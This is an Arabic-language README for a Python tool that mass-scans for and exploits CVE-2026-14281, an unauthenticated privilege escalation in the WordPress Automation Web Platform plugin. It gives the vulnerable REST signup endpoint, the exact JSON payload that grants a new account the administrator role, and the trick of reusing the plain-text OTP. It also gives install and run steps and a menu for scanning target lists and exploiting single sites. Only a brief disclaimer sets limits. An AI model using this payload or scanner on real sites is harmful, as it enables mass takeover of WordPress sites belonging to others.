
ماسح ضخم واستغلال لهدف واحد لـ CVE-2026-14281، وهو تصعيد صلاحيات غير مُصادَق عليه في إضافة WordPress Automation Web Platform عبر تسجيل REST.
ماسح ضخم + استغلال لهدف واحد لـ CVE-2026-14281 — تصعيد صلاحيات بدون مصادقة في إضافة ووردبريس Automation Web Platform (WAWP) الإصدار
<= 4.8.6.
إدارة صلاحيات غير سليمة (CWE-269) في إضافة ووردبريس Automation Web Platform (من 101gen). الإصدارات <= 4.8.6 متأثرة.
| الحقل | القيمة |
|---|---|
| CVE | CVE-2026-14281 |
| النوع | تصعيد صلاحيات بدون مصادقة |
| CVSS | 9.8 (حرج) |
| المصادقة | غير مطلوبة |
| المتأثر | إضافة WAWP <= 4.8.6 |
تكشف الإضافة عن مسار REST عام:
POST /wp-json/wawp/v1/signup/<op>
لا يوجد فحص للصلاحيات. يقوم المعالج بنسخ wawp_custom_fields التي يتحكم بها المهاجم إلى update_user_meta() — بدون قائمة سماح. يقوم المهاجم بتعيين:
{
"wawp_custom_fields": {
"wp_capabilities": {"administrator": true},
"wp_user_level": "10"
}
}
النتيجة: يحصل الحساب الجديد على دور administrator.
يُعاد رمز OTP (otp_transient) بنص صريح في جسم الاستجابة. طلب GET باستخدام ذلك الرمز يجعله مُتحققًا منه — دون الحاجة إلى بريد إلكتروني أو رسالة نصية.
/wp-json/wawp/v1/signup/ مع wp_capabilities: administrator/wp-login.php بالبيانات الجديدة/wp-admin/users.php3.7+requests, urllib3git clone https://github.com/yourname/langz-scanner.git
cd langz-scanner
pip install requests urllib3
python3 CVE-2026-14281.py
[1] Mass Scan -> detect many targets, save vuln to txt
[2] Verify Single -> exploit + confirm + auto cleanup
[0] Exit
Mass Scan: ملف قائمة الأهداف المدخلة، ملف الإخراج (افتراضي vuln.txt)، عدد الخيوط (افتراضي 20).
Verify Single: اكتب YA، أدخل عنوان URL للهدف. تنشئ الأداة مسؤولًا مؤقتًا، تتحقق، ثم تنظف.
يحتوي vuln.txt على عناوين URL المؤكدة القابلة للاستغلال فقط، واحد في كل سطر:
http://target1.com
https://target2.org
4.8.6/wp-json/wawp/v1/signup/For AUTHORIZED SECURITY TESTING only.
Do not use against systems you don't own or have permission to test.
The developer assumes no responsibility for misuse.
استخدمها بحكمة. المعرفة وُجدت للحماية، لا للتدمير.